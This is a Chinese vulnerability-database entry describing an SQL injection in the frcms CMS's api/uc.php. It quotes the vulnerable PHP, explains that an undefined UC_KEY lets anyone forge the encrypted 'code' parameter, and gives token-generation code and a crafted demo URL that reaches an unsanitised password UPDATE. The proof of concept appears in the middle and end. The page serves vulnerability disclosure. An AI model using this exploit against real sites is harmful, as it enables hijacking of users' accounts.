|frcms 注入 (可改任意用户密码 demo成功)#1 - VULHUB开源网络安全威胁库

frcms 注入 (可改任意用户密码 demo成功)#1

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： rt。 ### 详细说明：在api/uc.php中 ``` define('API_RETURN_FORBIDDEN', '-2'); define('UC_CLIENT_ROOT', FR_ROOT.'/uc_client'); include_once(FR_ROOT.'/api/api_config.php'); if(defined('IN_UC')) { exit('Invalid Request'); } else { error_reporting(0); set_magic_quotes_runtime(0); !isset($db)&&$db=connectdb(); defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); $get = $post = array(); $code = @$_GET['code']; parse_str(_authcode($code, 'DECODE', UC_KEY), $get); if(MAGIC_QUOTES_GPC) { $get = _stripslashes($get); } ``` 来看看所包含的这文件。 ``` define('FR_API',''); //是否开启整合，空为不整合，pw为整合phpwind，uc为整合Ucenter //此文件中的注释字符不可删除 if(FR_API&&FR_API=='uc'){ /*uc_config 开始*/ define('UC_CONNECT', 'mysql'); define('UC_DBHOST', 'localhost'); define('UC_DBUSER', 'root'); define('UC_DBPW', '123456'); define('UC_DBNAME', 'ucenter'); define('UC_DBCHARSET', 'gbk'); define('UC_DBTABLEPRE', 'uc_'); define('UC_DBCONNECT', '0'); define('UC_KEY', 'dfdfdfsdfdsfdsd'); define('UC_API', 'http://192.168.1.200/uc'); define('UC_CHARSET', 'gbk'); define('UC_IP', ''); define('UC_APPID', '1'); define('UC_PPP', '20'); /*uc_config 结束*/ if(!defined('UC_CLIENT_VERSION')){ @include_once(FR_ROOT.'/uc_client/client.php'); } }elseif(FR_API&&FR_API=='pw'){ define('P_W','admincp'); require_once(FR_ROOT.'/api/pw_api/security.php'); require_once(FR_ROOT.'/api/pw_api/pw_common.php'); /*pw_config 开始*/ define('UC_DBHOST', 'localhost'); define('UC_DBUSER', 'root'); define('UC_DBPW', '123456'); define('UC_DBNAME', 'phpwind'); define('UC_DBCHARSET', 'gbk'); define('UC_DBTABLEPRE', 'pw_'); define('UC_DBCONNECT', '0'); define('UC_KEY', '1u0ckr7zbyl58xqwljrq'); define('UC_API', 'http://192.168.1.200'); define('UC_CHARSET', 'gbk'); define('UC_IP', ''); define('UC_APPID', '2'); /*pw_config 结束*/ $uc_appid=UC_APPID; $uc_key=UC_KEY; ``` 这里一开始define('FR_API','') 为空然后肯定就不能进入那两个if 就没有赋值 ``` parse_str(_authcode($code, 'DECODE', UC_KEY), $get); if(MAGIC_QUOTES_GPC) { $get = _stripslashes($get); } ``` 那么这个UC_KEY 就是UC_KEY 就可以调用一个函数来生成语句了。随便找一个函数。 ``` function updatepw($get, $post) { global $db; if(!API_UPDATEPW) { return API_RETURN_FORBIDDEN; } $username = $get['username']; $password = $get['password']; $newpw = md5($password); $db->query("UPDATE ".$this->tablepre."member SET m_pwd='$newpw' WHERE m_login='$username'"); return API_RETURN_SUCCEED; } ``` 这里用户名和密码都是我们生成的语句所传递进来的所以我们可以update任意会员的密码。当然也可以注入。 ``` $code=urlencode(_authcode("time=999999999999999999999999&username=aaaa'&action=updatepw", 'ENCODE', $uc_key)); echo $code;exit; ``` 这里我调用函数生成一下加密字符串得到 ece1D670hYzmEkiFD%2FnY%2Fm5PqCzmA99OphcKcW5cb4dL3AzW%2BL73lRDDdNngdeYQnYzE6wYCC4WoIef2%2FKhd08acKElW30X4jIyIuyW3jUPADDbfsdnCcqE [<img src="https://images.seebug.org/upload/201408/210000490f3d8432592ec513e85021bd472a37db.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/210000490f3d8432592ec513e85021bd472a37db.jpg) 可以看到报错了成功引入了单引号。如果这里我们生成语句的时候把用户名和密码改一下就可以改任意用户的密码了。测试一下demo http://v2014.rccms.com/api/uc.php?code=e209ygVWvjwOg2ruKoPLOsY4PmxKnRndC73%2BVooImrexNhWivklLwRzSB011MsqX5CzUzxQa2beOvkmPXY0WW63US8VJal8MxDkMvVum5KtY1KvpZYnf6wKd28M1fg [<img src="https://images.seebug.org/upload/201408/2100014781185ca5bf55789e65c2a4b7c39859a3.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/2100014781185ca5bf55789e65c2a4b7c39859a3.jpg) 可以看到报错了自然也就是引入单引号了。 ### 漏洞证明： http://v2014.rccms.com/api/uc.php?code=e209ygVWvjwOg2ruKoPLOsY4PmxKnRndC73%2BVooImrexNhWivklLwRzSB011MsqX5CzUzxQa2beOvkmPXY0WW63US8VJal8MxDkMvVum5KtY1KvpZYnf6wKd28M1fg [<img src="https://images.seebug.org/upload/201408/2100014781185ca5bf55789e65c2a4b7c39859a3.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/2100014781185ca5bf55789e65c2a4b7c39859a3.jpg)

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™